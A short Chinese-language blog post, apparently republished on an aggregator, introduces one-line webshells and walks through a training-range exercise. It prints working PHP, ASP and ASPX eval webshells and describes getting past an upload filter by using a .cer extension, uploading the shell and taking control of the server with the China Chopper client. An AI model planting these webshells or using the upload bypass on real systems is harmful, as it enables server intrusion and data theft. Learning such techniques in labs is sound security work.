一句话木马:初识木马练习

Posted Zeker62

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了一句话木马:初识木马练习相关的知识,希望对你有一定的参考价值。

一句话木马:

不是mua,木马是根据撰写了恶意代码的文件,以实现恶意攻击的目的。

一句话木马就一句话,配合中国菜刀等工具可以实现数据的摄取。

php木马: <?php @eval($_POST['password']);?>
asp是:   <%eval request ("password")%>
aspx是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe");%>

以asp为例子:

  • eval:执行
  • request:从用户那里,获得里面的信息
  • password:我们与木马相约好的密码。

这就是一句话木马

什么是webshell

就是网络的人机交互界面。
拿shell就是拿去web服务器的权限。

靶场练习,上传一句话木马到服务器,并摄取信息:

制作一句话木马文件:


这样,我们的文件就制作好了。

然后随便找一个地方上传,结果发现,不允许上传。

cer文件和asp文件都指向的是asp.dll 所以这两个文件都可以被解析。
但是这里怕文件太小了,我们在文件里面加点乱七八糟的东西

上传,记住路径

打开路径看是否上传成功
乱七八糟也不知道是啥,但是就似乎上传成功了

打开中国菜刀,远程连接,入侵服务器

类型选择ASP

添加好后双击打开,就可以看见里面的内容了

路漫漫其修远兮,吾将上下而求索

以上是关于一句话木马:初识木马练习的主要内容,如果未能解决你的问题,请参考以下文章

一句话木马饶过过滤

一句话木马简介

以下哪些是常见的php 一句话木马

PHP的网站,怎么扫描出潜藏的一句话木马

php eval函数一句话木马代码

黑客必学之“网页木马webshell”